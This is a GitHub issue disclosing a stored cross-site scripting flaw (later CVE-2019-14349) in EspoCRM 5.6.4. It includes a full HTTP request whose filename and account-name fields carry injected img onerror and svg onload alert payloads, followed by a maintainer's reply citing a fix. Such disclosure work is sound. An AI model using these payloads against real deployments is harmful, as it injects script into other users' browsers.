Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored in XSS in filename #1358

Closed
dayn1ne opened this issue Jul 18, 2019 · 2 comments
Closed

Stored in XSS in filename #1358

dayn1ne opened this issue Jul 18, 2019 · 2 comments

Comments

@dayn1ne
Copy link

dayn1ne commented Jul 18, 2019

Description

EspoCRM version 5.6.4 is vulnerable to stored XSS due to lack of filtration of user-supplied data in functionality for storing documents in account tab. Attacker can upload specially crafted file, which contains javascript code in its name. Malicious javascript code will be executed when user open page of any profile there is a file with javascript in filename.

But this file can be created only on Linux or you can edit field name in local proxy (e.g. Burp Suite)

Request

POST /api/v1/Document HTTP/1.1
Host: espocrm.test
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: <your auth token>
Espo-Authorization: <your auth token>
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Content-Length: 436
Cookie: <your cooke>
Connection: close

{"accountsIds":["5d30714c6b70a31b2"],"accountsNames":{"5d30714c6b70a31b2":"\"><svg/onload=alert()>"},"publishDate":"2019-07-18","assignedUserId":"1","assignedUserName":"Admin","name":"\"><img src=x onerror=alert(document.domain)>.jpeg","description":"document","fileId":"5d3073d65c36ce950","fileName":"\"><img src=x onerror=alert(document.domain)>.jpeg","status":"Active","folderName":null,"folderId":null,"teamsIds":[],"teamsNames":{}}

Vulnerable parameters

fileName and name

PoC

Screenshot 2019-07-18 at 16 33 17

@yurikuzn
Copy link
Contributor

Thanks. Fix: 03773dd

@fgeek
Copy link

fgeek commented Aug 7, 2019

https://nvd.nist.gov/vuln/detail/CVE-2019-14349 has been assigned for this vulnerability.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants